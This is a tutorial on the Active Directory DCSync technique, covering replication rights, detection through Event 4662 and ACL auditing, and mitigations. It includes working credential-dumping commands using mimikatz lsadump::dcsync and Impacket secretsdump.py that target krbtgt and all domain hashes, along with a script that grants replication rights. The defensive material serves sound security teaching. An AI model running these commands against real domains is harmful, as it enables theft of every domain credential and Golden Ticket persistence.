DCSync Attack and Defense: Abusing Directory Replication Rights


Disclaimer: This article is for educational purposes and authorized security testing only. Run these techniques exclusively against systems you own or have explicit written permission to assess. Extracting domain credentials without authorization is a crime in virtually every jurisdiction.

Introduction

DCSync is one of the most impactful post-exploitation techniques in an Active Directory environment. Instead of running code on a Domain Controller (DC) to read the NTDS.dit database, an attacker asks the DC nicely to hand over secrets — by pretending to be another DC performing routine replication. The result is the same: NTLM hashes, Kerberos keys, and even cleartext credentials for any account in the domain, including the krbtgt account that underpins Golden Ticket attacks.

In this article you'll learn how the underlying replication protocol works, how to perform DCSync with mimikatz and secretsdump.py, and — given equal weight — how defenders detect and prevent it.

How It Works

Domain Controllers keep their copies of the directory in sync using the Directory Replication Service (DRS) Remote Protocol, exposed over RPC as DRSUAPI (drsuapi, MS-DRSR). The key call is:

  • IDL_DRSGetNCChanges — the RPC operation a DC invokes to pull changes (including secret attributes like unicodePwd, dBCSPwd, supplementalCredentials) from a replication partner.

To invoke it, the caller must hold these extended rights on the domain object:

  • DS-Replication-Get-Changes (GUID 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)
  • DS-Replication-Get-Changes-All (GUID 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)
  • Optionally DS-Replication-Get-Changes-In-Filtered-Set (89e95b76-444d-4c62-991a-0facbeda640c)

By default these rights are granted to Domain Admins, Enterprise Admins, and Domain Controllers. The danger is that any other principal granted them — through a misconfigured ACL, a delegated admin, or an attacker who edited the domain DACL — can replicate secrets remotely without ever touching the DC's disk or filesystem. This maps to MITRE ATT&CK T1003.006 (OS Credential Dumping: DCSync).

Prerequisites / Lab Setup

To follow along you need:

  • A test AD forest (e.g., a single DC running Windows Server 2019/2022) and a domain-joined workstation.
  • A controlled account that holds the two replication rights above. In the lab you can grant them explicitly:
# Run on the DC as Domain Admin (LAB ONLY)
# Grant replication rights to a low-priv user to simulate a misconfiguration
Import-Module ActiveDirectory
$user     = "svc-backup"
$domainDN = "DC=corp,DC=local"
$acl  = Get-Acl "AD:\$domainDN"
$sid  = (Get-ADUser $user).SID
$guidGetChanges    = [GUID]"1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"   # DS-Replication-Get-Changes
$guidGetChangesAll = [GUID]"1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"   # DS-Replication-Get-Changes-All
foreach ($g in @($guidGetChanges,$guidGetChangesAll)) {
  # Object-specific ACE: allow the extended right identified by $g on the domain head
  $ace = New-Object System.DirectoryServices.ActiveDirectoryAccessRule(
    $sid,"ExtendedRight","Allow",$g)
  $acl.AddAccessRule($ace)
}
Set-Acl "AD:\$domainDN" $acl

Attack Walkthrough

Step 1 — Find principals that can DCSync

Before launching the attack, enumerate who holds replication rights. PowerView is convenient:

# Identify non-default principals with replication rights
Get-DomainObjectAcl -SearchBase "DC=corp,DC=local" -ResolveGUIDs |
  Where-Object {
    $_.ObjectAceType -match 'Replication-Get-Changes'
  } | Select-Object SecurityIdentifier, ObjectAceType

BloodHound surfaces the same thing graphically via the GetChanges / GetChangesAll / DCSync edges — look for paths from any owned principal to the domain node.

Step 2 — DCSync with mimikatz

On a Windows host, running in the context of (or after impersonating) the privileged account, dump a single high-value account first — krbtgt:

mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt

To target a specific DC and a regular user:

mimikatz # lsadump::dcsync /domain:corp.local /dc:DC01.corp.local /user:Administrator

The output includes the NTLM hash (Hash NTLM), Kerberos AES256/AES128/DES keys, and password history: everything needed for pass-the-hash, offline password cracking, or forging a Golden Ticket from the krbtgt key.

Step 3 — DCSync from Linux with secretsdump

From an attacker box (e.g., Kali), Impacket's secretsdump.py performs DCSync remotely with no agent on the DC. The -just-dc switches use DRSUAPI under the hood:

# Dump all domain hashes via DRSUAPI replication
secretsdump.py corp.local/svc-backup:'P@ssw0rd!'@DC01.corp.local -just-dc

# NTLM hashes only (faster, no Kerberos keys)
secretsdump.py corp.local/svc-backup@DC01.corp.local -just-dc-ntlm -hashes :<NTLMHASH>

# Target a single account
secretsdump.py 'corp.local/svc-backup:P@ssw0rd!'@DC01.corp.local -just-dc-user krbtgt

Output is written in user:rid:lmhash:nthash format, followed by Kerberos key and cleartext sections. With the krbtgt hash and the domain SID, the engagement effectively pivots to full domain persistence.

Attack Flow Diagram

[Diagram 1: DCSync attack flow]

Diagram: the attacker impersonates a replication partner and calls IDL_DRSGetNCChanges over DRSUAPI; the DC checks replication rights, reads secrets from NTDS.dit, and returns them.

Detection & Defense (Blue Team)

DCSync is legitimate replication traffic when it comes from a real DC, which makes detection a matter of identifying the source and principal, not the protocol itself.

Detection

  • Network anomaly — replication from a non-DC host. A DsGetNCChanges request originating from any IP that is not a Domain Controller is the single strongest signal. Tools such as Microsoft Defender for Identity and many SIEM rules alert specifically on this ("Suspected DCSync attack").
  • Event log correlation. Enable auditing of Directory Service Access and monitor Event ID 4662 ("An operation was performed on an object") where the Properties field contains the replication GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 or 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 and the Subject account is not a DC computer account. A sample hunting filter:
# Hunt for non-DC accounts invoking replication rights (Event 4662)
$replGuids = '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2|1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4662} |
  Where-Object {
    $_.Message -match $replGuids -and
    $_.Message -notmatch 'Account Name:\s+\S+\$'   # subject is a machine ($) account, e.g. a DC replicating
  } | Format-List TimeCreated, Message
  • Network sensors. Zeek/Suricata signatures and the dce_rpc analyzer can flag DRSUAPI DsGetNCChanges opnum 3 calls from unexpected sources.
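The event-log rule described above, carried through as an added worked example (this is not code from the original article): a small Python hunt that parses Event ID 4662 records in their XML form (what wevtutil or Get-WinEvent's ToXml() emit), looks for the replication GUIDs in the Properties field, and suppresses subjects whose SID is on an allowlist of Domain Controller machine accounts. The three sample events and the DC_SIDS allowlist are constructed values; the exact layout of a real Properties field differs slightly, but the GUIDs appear in it the same way.

```python
"""Flag Event ID 4662 records where a non-DC principal exercised a replication right.

Added example for this article (not from the original post). Rule: replication
GUID present in Properties AND the subject SID is not a known Domain Controller.
"""
import re
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Extended-right GUIDs that permit DCSync (as listed in the article)
REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

# Assumption: the SOC maintains an allowlist of DC machine-account SIDs (constructed value)
DC_SIDS = {"S-1-5-21-1111-2222-3333-1000"}  # DC01$


def parse_4662(xml_text):
    """Return the EventData fields of one 4662 event as a {Name: text} dict."""
    root = ET.fromstring(xml_text)
    return {d.get("Name"): (d.text or "") for d in root.findall(".//e:EventData/e:Data", NS)}


def evaluate(event):
    """Return the replication-right names used by a non-DC subject, or [] if benign."""
    used = [REPL_GUIDS[g.lower()] for g in GUID_RE.findall(event.get("Properties", ""))
            if g.lower() in REPL_GUIDS]
    if not used:
        return []          # 4662 for some other property: not a DCSync signal
    if event.get("SubjectUserSid", "") in DC_SIDS:
        return []          # a known DC replicating: expected traffic
    return used            # anything else (including an unlisted DC) is escalated


def hunt(xml_events):
    """Return (subject_name, rights_used) tuples for the events worth escalating."""
    hits = []
    for xml_text in xml_events:
        ev = parse_4662(xml_text)
        used = evaluate(ev)
        if used:
            hits.append((ev.get("SubjectUserName"), used))
    return hits


def _sample(subject_name, subject_sid, props):
    # Constructed 4662 record in the Windows event XML schema (abridged)
    return f"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4662</EventID><Channel>Security</Channel></System>
  <EventData>
    <Data Name="SubjectUserSid">{subject_sid}</Data>
    <Data Name="SubjectUserName">{subject_name}</Data>
    <Data Name="SubjectDomainName">CORP</Data>
    <Data Name="ObjectType">%{{19195a5b-6da0-11d0-afd3-00c04fd930c9}}</Data>
    <Data Name="ObjectName">DC=corp,DC=local</Data>
    <Data Name="AccessMask">0x100</Data>
    <Data Name="Properties">{props}</Data>
  </EventData>
</Event>"""


# Constructed sample: a DC replicating, a service account DCSyncing, an unrelated read
SAMPLE_EVENTS = [
    _sample("DC01$", "S-1-5-21-1111-2222-3333-1000",
            "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"),
    _sample("svc-backup", "S-1-5-21-1111-2222-3333-1105",
            "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"),
    _sample("jdoe", "S-1-5-21-1111-2222-3333-1201",
            "{aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee}"),   # placeholder property GUID
]

if __name__ == "__main__":
    for name, rights in hunt(SAMPLE_EVENTS):
        print(f"ALERT: {name} used {', '.join(rights)} on the domain head")
```

Keying the suppression on the subject SID rather than on a trailing `$` in the account name means a machine account that is not a DC (or a DC that was never added to the allowlist) still surfaces, which is the behaviour you want for a paging rule.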

Defense / Mitigation

  • Audit and minimize replication rights. Periodically enumerate every principal holding DS-Replication-Get-Changes-All on the domain head and remove any that aren't DCs or strictly required. Repurpose the PowerView/Get-Acl queries above as a recurring control.
  • Protect privileged accounts. Place high-value accounts in Protected Users, enforce tiered administration, and ensure krbtgt is rotated (twice, with a delay) if compromise is suspected — DCSync of krbtgt is the gateway to Golden Tickets. See Active Directory hardening fundamentals.
  • Limit RPC exposure. Restrict which hosts can reach DCs over the RPC/drsuapi interfaces using firewall rules and IPsec, so replication is only possible DC-to-DC.
  • Deploy an identity threat sensor. Defender for Identity, or equivalent, installs on DCs and baselines normal replication partners — it raises high-fidelity alerts when a workstation suddenly speaks DRSUAPI.
  • Alert, don't just log. Wire Event ID 4662 with replication GUIDs into your SIEM with an allowlist of legitimate DC SIDs so any deviation pages the SOC.
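The replication-rights audit that Step 1 enumerates with PowerView and that the first mitigation bullet asks you to run as a recurring control, carried through as an added worked example (not code from the original article or from PowerView): a parser for the SDDL string of the domain head, which is what `(Get-Acl "AD:\DC=corp,DC=local").Sddl` returns. It flags every allow ACE that grants one of the three replication extended rights to a trustee outside an expected set, and goes one step beyond the page's query by also flagging unscoped `CR` or `GA` grants, since control access without an object GUID covers every extended right, replication included. The sample SDDL is constructed; the EXPECTED_TRUSTEES set (the standard SDDL abbreviations DA, EA, DD, ED for Domain Admins, Enterprise Admins, Domain Controllers and Enterprise Domain Controllers) is an assumption to tune per forest.

```python
"""Audit a domain-head DACL in SDDL form for principals holding DCSync-capable rights.

Added example for this article, not code from the original post or from PowerView.
"""
import re

REPL_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
ADS_RIGHT_DS_CONTROL_ACCESS = 0x100      # "CR" in SDDL: extended rights
GENERIC_ALL = 0x10000000                 # "GA" in SDDL
EXPECTED_TRUSTEES = {"DA", "EA", "DD", "ED"}   # assumption: tune per forest

ACE_RE = re.compile(r"\(([^)]*)\)")


def rights_grant_control_access(rights):
    """True if the SDDL rights field includes extended rights (CR) or GENERIC_ALL (GA)."""
    if rights.lower().startswith("0x"):          # numeric access mask form
        mask = int(rights, 16)
        return bool(mask & (ADS_RIGHT_DS_CONTROL_ACCESS | GENERIC_ALL))
    codes = {rights[i:i + 2] for i in range(0, len(rights), 2)}   # two-letter codes
    return bool(codes & {"CR", "GA"})


def dacl_aces(sddl):
    """Yield (type, flags, rights, object_guid, inherit_guid, trustee) for each DACL ACE."""
    parts = re.split(r"(?=[OGDS]:)", sddl)       # O:, G:, D:, S: components
    dacl = next((p for p in parts if p.startswith("D:")), "")
    for body in ACE_RE.findall(dacl):
        fields = body.split(";")
        if len(fields) >= 6:
            yield tuple(fields[:6])


def audit_replication_rights(sddl, expected=EXPECTED_TRUSTEES):
    """Return [(trustee, right)] for allow ACEs granting DCSync-capable rights to unexpected trustees."""
    findings = []
    for ace_type, _flags, rights, obj_guid, _inh, trustee in dacl_aces(sddl):
        if ace_type not in ("A", "OA"):          # deny/audit ACEs grant nothing
            continue
        if not rights_grant_control_access(rights):
            continue
        obj_guid = obj_guid.lower()
        if obj_guid in REPL_GUIDS:
            right = REPL_GUIDS[obj_guid]
        elif obj_guid == "":
            right = "ALL extended rights (unscoped CR/GA)"   # includes replication
        else:
            continue                             # some other, unrelated extended right
        if trustee not in expected:
            findings.append((trustee, right))
    return findings


# Constructed sample: defaults for DA/ED, a delegated service account, and an unscoped grant
SAMPLE_SDDL = (
    "O:DAG:DAD:AI"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;DA)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DA)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;ED)"
    "(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1105)"  # svc-backup
    "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-1111-2222-3333-1105)"
    "(A;;RPLCLORC;;;AU)"                          # read-only: not a finding
    "(A;;0x100;;;S-1-5-21-1111-2222-3333-1300)"   # unscoped control access: all extended rights
    "S:AI(AU;SA;WDWOWP;;;WD)"
)

if __name__ == "__main__":
    for trustee, right in audit_replication_rights(SAMPLE_SDDL):
        print(f"FINDING: {trustee} holds {right} on the domain head")
```

Resolve the flagged SIDs to names with Get-ADObject or similar before acting on them, and diff each run's findings against the previous one so a newly added ACE, rather than the long-standing defaults, is what reaches the reviewer.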

Conclusion

DCSync turns a single misconfigured ACL into full-domain credential compromise without dropping a single file on a Domain Controller. The offense is trivial once replication rights are in reach — lsadump::dcsync or secretsdump.py -just-dc and you're done. The defense is equally tractable but requires discipline: keep replication rights minimal, monitor Event 4662 for non-DC principals using the replication GUIDs, and deploy an identity sensor that knows which hosts are supposed to replicate. Treat any DRSUAPI replication from a non-DC as an incident until proven otherwise.
